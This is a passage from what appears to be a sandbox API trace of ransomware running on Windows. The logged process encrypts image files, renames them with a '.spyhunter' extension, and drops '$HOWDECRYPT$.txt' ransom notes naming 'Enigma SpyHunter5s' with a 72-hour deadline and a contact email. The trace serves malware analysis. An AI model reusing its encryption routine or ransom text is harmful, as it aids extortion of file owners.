lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.737] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ee0c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57ee0c*=0x2800, lpOverlapped=0x0) returned 1 [0147.737] GetProcessHeap () returned 0x2c0000 [0147.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0147.737] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.737] WriteFile (in: hFile=0x178, lpBuffer=0x57ee4c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ee0c, lpOverlapped=0x0 | out: lpBuffer=0x57ee4c*, lpNumberOfBytesWritten=0x57ee0c*=0x4, lpOverlapped=0x0) returned 1 [0147.737] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ee0c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ee0c*=0x30, lpOverlapped=0x0) returned 1 [0147.737] CloseHandle (hObject=0x178) returned 1 [0147.737] GetProcessHeap () returned 0x2c0000 [0147.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0147.737] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\oFiWDltzZK.bmp.spyhunter") returned 79 [0147.738] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\oFiWDltzZK.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\ofiwdltzzk.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\oFiWDltzZK.bmp.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\ofiwdltzzk.bmp.spyhunter")) returned 1 [0147.738] GetProcessHeap () returned 0x2c0000 [0147.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0147.739] GetProcessHeap () returned 0x2c0000 [0147.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.739] GetProcessHeap () returned 0x2c0000 [0147.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c81f60 | out: hHeap=0x2c0000) returned 1 [0147.739] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\f-3pxtm_wwea\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.739] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0147.739] WriteFile (in: hFile=0x178, lpBuffer=0x57ed7f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57eea8, lpOverlapped=0x0 | out: lpBuffer=0x57ed7f*, lpNumberOfBytesWritten=0x57eea8*=0x127, lpOverlapped=0x0) returned 1 [0147.740] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0147.740] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57eea8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57eea8*=0x2ac, lpOverlapped=0x0) returned 1 [0147.740] CloseHandle (hObject=0x178) returned 1 [0147.740] GetProcessHeap () returned 0x2c0000 [0147.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3a2a0 | out: hHeap=0x2c0000) returned 1 [0147.741] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ee48 | out: pbBuffer=0x57ee48) returned 1 [0147.741] GetProcessHeap () returned 0x2c0000 [0147.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.742] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ee40*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ee40*=0x30) returned 1 [0147.742] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\Yi0tFlXGE.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\f-3pxtm_wwea\\yi0tflxge.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.742] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\Yi0tFlXGE.jpg") returned 81 [0147.742] StrStrW (lpFirst="Yi0tFlXGE.jpg", lpSrch=".txt") returned 0x0 [0147.742] GetProcessHeap () returned 0x2c0000 [0147.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0147.742] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ee04, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57ee04*=0x2800, lpOverlapped=0x0) returned 1 [0147.743] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.743] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ee04, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57ee04*=0x2800, lpOverlapped=0x0) returned 1 [0147.743] GetProcessHeap () returned 0x2c0000 [0147.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0147.743] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.743] WriteFile (in: hFile=0x178, lpBuffer=0x57ee44*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ee04, lpOverlapped=0x0 | out: lpBuffer=0x57ee44*, lpNumberOfBytesWritten=0x57ee04*=0x4, lpOverlapped=0x0) returned 1 [0147.743] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ee04, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ee04*=0x30, lpOverlapped=0x0) returned 1 [0147.743] CloseHandle (hObject=0x178) returned 1 [0147.744] GetProcessHeap () returned 0x2c0000 [0147.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0147.744] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\Yi0tFlXGE.jpg.spyhunter") returned 91 [0147.744] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\Yi0tFlXGE.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\f-3pxtm_wwea\\yi0tflxge.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\Yi0tFlXGE.jpg.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\f-3pxtm_wwea\\yi0tflxge.jpg.spyhunter")) returned 1 [0147.744] GetProcessHeap () returned 0x2c0000 [0147.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0147.744] GetProcessHeap () returned 0x2c0000 [0147.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.744] GetProcessHeap () returned 0x2c0000 [0147.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f644e8 | out: hHeap=0x2c0000) returned 1 [0147.745] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ee40 | out: pbBuffer=0x57ee40) returned 1 [0147.745] GetProcessHeap () returned 0x2c0000 [0147.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.745] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ee38*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ee38*=0x30) returned 1 [0147.745] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\KtUfjDT_SUy3MucBM_ZY.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\f-3pxtm_wwea\\ktufjdt_suy3mucbm_zy.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.745] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\KtUfjDT_SUy3MucBM_ZY.gif") returned 92 [0147.745] StrStrW (lpFirst="KtUfjDT_SUy3MucBM_ZY.gif", lpSrch=".txt") returned 0x0 [0147.745] GetProcessHeap () returned 0x2c0000 [0147.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0147.745] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57edfc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57edfc*=0x2800, lpOverlapped=0x0) returned 1 [0147.746] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.746] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57edfc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57edfc*=0x2800, lpOverlapped=0x0) returned 1 [0147.746] GetProcessHeap () returned 0x2c0000 [0147.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0147.746] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.746] WriteFile (in: hFile=0x178, lpBuffer=0x57ee3c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57edfc, lpOverlapped=0x0 | out: lpBuffer=0x57ee3c*, lpNumberOfBytesWritten=0x57edfc*=0x4, lpOverlapped=0x0) returned 1 [0147.746] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57edfc, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57edfc*=0x30, lpOverlapped=0x0) returned 1 [0147.746] CloseHandle (hObject=0x178) returned 1 [0147.747] GetProcessHeap () returned 0x2c0000 [0147.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0147.747] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\KtUfjDT_SUy3MucBM_ZY.gif.spyhunter") returned 102 [0147.747] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\KtUfjDT_SUy3MucBM_ZY.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\f-3pxtm_wwea\\ktufjdt_suy3mucbm_zy.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\KtUfjDT_SUy3MucBM_ZY.gif.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\f-3pxtm_wwea\\ktufjdt_suy3mucbm_zy.gif.spyhunter")) returned 1 [0147.747] GetProcessHeap () returned 0x2c0000 [0147.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0147.747] GetProcessHeap () returned 0x2c0000 [0147.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.747] GetProcessHeap () returned 0x2c0000 [0147.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f61c48 | out: hHeap=0x2c0000) returned 1 [0147.748] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ee40 | out: pbBuffer=0x57ee40) returned 1 [0147.748] GetProcessHeap () returned 0x2c0000 [0147.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.748] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ee38*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ee38*=0x30) returned 1 [0147.748] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\FCt0j6LVTx.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\f-3pxtm_wwea\\fct0j6lvtx.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.748] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\FCt0j6LVTx.png") returned 82 [0147.748] StrStrW (lpFirst="FCt0j6LVTx.png", lpSrch=".txt") returned 0x0 [0147.748] GetProcessHeap () returned 0x2c0000 [0147.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0147.748] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57edfc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57edfc*=0x2800, lpOverlapped=0x0) returned 1 [0147.749] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.749] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57edfc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57edfc*=0x2800, lpOverlapped=0x0) returned 1 [0147.749] GetProcessHeap () returned 0x2c0000 [0147.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0147.749] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.749] WriteFile (in: hFile=0x178, lpBuffer=0x57ee3c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57edfc, lpOverlapped=0x0 | out: lpBuffer=0x57ee3c*, lpNumberOfBytesWritten=0x57edfc*=0x4, lpOverlapped=0x0) returned 1 [0147.749] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57edfc, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57edfc*=0x30, lpOverlapped=0x0) returned 1 [0147.750] CloseHandle (hObject=0x178) returned 1 [0147.750] GetProcessHeap () returned 0x2c0000 [0147.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0147.750] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\FCt0j6LVTx.png.spyhunter") returned 92 [0147.750] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\FCt0j6LVTx.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\f-3pxtm_wwea\\fct0j6lvtx.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\FCt0j6LVTx.png.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\f-3pxtm_wwea\\fct0j6lvtx.png.spyhunter")) returned 1 [0147.750] GetProcessHeap () returned 0x2c0000 [0147.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0147.750] GetProcessHeap () returned 0x2c0000 [0147.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.750] GetProcessHeap () returned 0x2c0000 [0147.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f643f8 | out: hHeap=0x2c0000) returned 1 [0147.751] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ee38 | out: pbBuffer=0x57ee38) returned 1 [0147.751] GetProcessHeap () returned 0x2c0000 [0147.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.751] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ee30*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ee30*=0x30) returned 1 [0147.751] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\dXuuZhp RqDa-uWz.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\f-3pxtm_wwea\\dxuuzhp rqda-uwz.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.751] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\dXuuZhp RqDa-uWz.png") returned 88 [0147.751] StrStrW (lpFirst="dXuuZhp RqDa-uWz.png", lpSrch=".txt") returned 0x0 [0147.751] GetProcessHeap () returned 0x2c0000 [0147.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0147.751] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57edf4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57edf4*=0x2800, lpOverlapped=0x0) returned 1 [0147.752] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.752] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57edf4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57edf4*=0x2800, lpOverlapped=0x0) returned 1 [0147.752] GetProcessHeap () returned 0x2c0000 [0147.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0147.752] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.752] WriteFile (in: hFile=0x178, lpBuffer=0x57ee34*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57edf4, lpOverlapped=0x0 | out: lpBuffer=0x57ee34*, lpNumberOfBytesWritten=0x57edf4*=0x4, lpOverlapped=0x0) returned 1 [0147.752] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57edf4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57edf4*=0x30, lpOverlapped=0x0) returned 1 [0147.752] CloseHandle (hObject=0x178) returned 1 [0147.753] GetProcessHeap () returned 0x2c0000 [0147.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0147.753] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\dXuuZhp RqDa-uWz.png.spyhunter") returned 98 [0147.753] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\dXuuZhp RqDa-uWz.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\f-3pxtm_wwea\\dxuuzhp rqda-uwz.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\dXuuZhp RqDa-uWz.png.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\f-3pxtm_wwea\\dxuuzhp rqda-uwz.png.spyhunter")) returned 1 [0147.753] GetProcessHeap () returned 0x2c0000 [0147.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0147.753] GetProcessHeap () returned 0x2c0000 [0147.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.753] GetProcessHeap () returned 0x2c0000 [0147.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f46528 | out: hHeap=0x2c0000) returned 1 [0147.753] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\AO-ywnYoFhy76t\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\f-3pxtm_wwea\\ao-ywnyofhy76t\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.754] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0147.754] WriteFile (in: hFile=0x178, lpBuffer=0x57ed6b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ee94, lpOverlapped=0x0 | out: lpBuffer=0x57ed6b*, lpNumberOfBytesWritten=0x57ee94*=0x127, lpOverlapped=0x0) returned 1 [0147.755] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0147.755] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ee94, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ee94*=0x2ac, lpOverlapped=0x0) returned 1 [0147.755] CloseHandle (hObject=0x178) returned 1 [0147.755] GetProcessHeap () returned 0x2c0000 [0147.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f67750 | out: hHeap=0x2c0000) returned 1 [0147.755] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, 